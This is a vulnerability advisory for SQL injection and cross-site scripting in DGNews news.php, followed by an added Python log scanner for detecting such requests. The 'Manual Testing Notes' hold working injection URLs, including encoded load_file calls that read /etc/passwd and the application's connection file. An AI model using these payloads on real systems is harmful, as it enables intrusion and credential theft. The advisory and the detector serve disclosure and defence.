DGNews news.php Multiple Variable SQL Injection

2007-05-28T00:00:00
ID OSVDB:34227
Type osvdb
Reporter laurent gaffie (laurent.gaffie@gmail.com), Jesper Jurcenoks (jesper.jurcenoks@netvigilance.com)
Modified 2007-05-28T00:00:00

Description

Vulnerability Description

DGNews contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the news.php script not properly sanitizing user-supplied input to the 'catid' or 'newsid' variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. Additionally, the crafted input is sent back to the browser without filtering, allowing for cross-site scripting attacks. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.


Manual Testing Notes

http://[target]/[PRODUCT-DIRECTORY]/news.php?go=newslist&catid=' UNION SELECT 1,site_title FROM news_config WHERE '1

/news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4,5,6,7%20from%20news_comment/*

/news.php?go=fullnews&newsid=-9+union+select+1,2,load_file(0x2F7573722F6C6F63616C2F617061636865322F6874646F63732F64676E6577732F61 646D696E2F636F6E6E2E706870),4,5,6,7%20from%20news_comment/*
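With no patch available, requests of the kind shown above can at least be detected in web server access logs. The following is an added example, not part of the original advisory or of DGNews: it flags news.php requests whose 'catid' or 'newsid' value is not a plain number, which covers both the SQL injection and the reflected script input. The assumption that legitimate ids are non-negative integers, the combined log format, the /dgnews/ path and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names as unsanitized in news.php.
WATCHED = ("catid", "newsid")
# Assumption: legitimate values are plain non-negative integer ids.
NUMERIC_ID = re.compile(r"\d+")
# Request line of a combined-format access log entry (tolerates raw spaces).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def suspicious_params(url):
    """Return {param: decoded value} for watched news.php parameters that are not numeric."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/news.php"):
        return {}
    query = parse_qs(parts.query)  # decodes %xx and '+' before the check
    hits = {}
    for name in WATCHED:
        for value in query.get(name, []):
            if not NUMERIC_ID.fullmatch(value):
                hits[name] = value
    return hits

def scan(lines):
    """Return (line number, client address, offending params) for each flagged log line."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group(1))
        if hits:
            findings.append((lineno, line.split()[0], hits))
    return findings

# Constructed sample log lines (documentation addresses, hypothetical /dgnews/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [28/May/2007:10:00:01 +0000] "GET /dgnews/news.php?go=fullnews&newsid=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [28/May/2007:10:00:05 +0000] "GET /dgnews/news.php?go=fullnews&newsid=-9+union+select+1,2,3 HTTP/1.1" 200 733',
    '192.0.2.44 - - [28/May/2007:10:00:09 +0000] "GET /dgnews/news.php?go=newslist&catid=%27%20UNION%20SELECT%201 HTTP/1.1" 200 640',
    '192.0.2.10 - - [28/May/2007:10:00:12 +0000] "GET /dgnews/index.php?catid=abc HTTP/1.1" 200 200',
]

if __name__ == "__main__":
    for lineno, client, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent non-numeric {hits}")
```

The same numeric-only check can be enforced in front of the application (for example in a reverse proxy rule) to reject such requests instead of only logging them.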

References:

Vendor URL: http://www.diangemilang.com/dgscripts.php
Secunia Advisory ID: 25438
Related OSVDB ID: 34226
Related OSVDB ID: 34228
Other Advisory URL: http://www.netvigilance.com/advisory0022
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0508.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-05/0411.html
Keyword: netVigilance Security Advisory #22
ISS X-Force ID: 34539
FrSIRT Advisory: ADV-2007-1981
CVE-2007-0693
Bugtraq ID: 24201